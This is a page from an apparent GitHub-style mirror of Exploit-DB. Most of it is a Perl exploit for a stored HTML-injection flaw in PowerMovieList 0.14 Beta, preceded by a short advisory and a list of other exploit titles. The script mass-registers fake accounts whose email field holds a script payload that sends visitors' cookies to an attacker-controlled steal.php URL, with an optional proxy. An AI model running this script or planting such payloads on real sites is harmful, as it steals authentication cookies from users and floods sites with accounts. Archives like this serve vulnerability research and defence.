bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/28823.pl
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

48 lines
No EOL
2.6 KiB
Perl
Executable file
Raw Blame History

source: https://www.securityfocus.com/bid/20564/info
PowerMovieList is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would execute in the context of the affected website, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
#!/usr/bin/perl -w
use Term::ANSIColor;
use LWP::UserAgent;
use HTTP::Request::Common;
if (@ARGV < 6 )
{
print color 'bold green on_black';
print q(
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## #
## #
## [ PowerMovieList <= 0.14 Beta ] #
##
## Class: XSS Remote Cookie Disclosure Exploit && Flooder #
## Patch: Unavailable #
## Published 2006/10/16 #
## Remote: Yes
## Local: No #
## Type: High #
## Ext: Magic_quotes_gpc= On #
## Site: http://www.powermovielist.com/ #
## Author: MP
## Contact: mp01010@yahoo.com #
## #
###################################################################);
print ("\nArgs: 1-> pmlSite 2->AttackerSite 3->FakeUser 4->FakePass 5->FakeEmail 6->Times 7->Proxy\n");
print ("\n@> Example Without Proxy: \n");
print ("perl $0 http://victim.com/pml/ http://attacker.com/steal.php?c= PcFreakUser Password13 tsvete\@yahoo.com 10 \n");
print ("@> Example With Proxy: \n");
print ("perl $0 http://victim.com/pml/ http://attacker.com/steal.php?c= PcFreakUser Password13 tsvete\@yahoo.com 10 -P
200.88.223.98:80 \n \n");
print color 'reset';exit(1);
}
$mpbaumqu=LWP::UserAgent->new() or die;
if (grep/\-P/,@ARGV) { $mpbaumqu->proxy("http" => "http://$ARGV[7]");};
for ($times=1;$times<=$ARGV[5];$times++) {
$mpbaumqu->timeout(100);
$mpbaumqu->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20060902 Firefox/1.0.4 (Debian package
1.0.4-2sarge11)");
$mpbaumqu->request(POST "$ARGV[0]".'edituser.php?Active=index&Display=&&action=addsave&F=', ['name' =>
"$times"."$ARGV[2]", 'pass' => "$ARGV[3]", 'passrep' => "$ARGV[3]", 'email' => "<script>img = new Image(); img.src =
\""."$ARGV[1]"."\"+document.cookie;</script><"."$ARGV[4]"."$times"]);
};
Reference in a new issue View git blame Copy permalink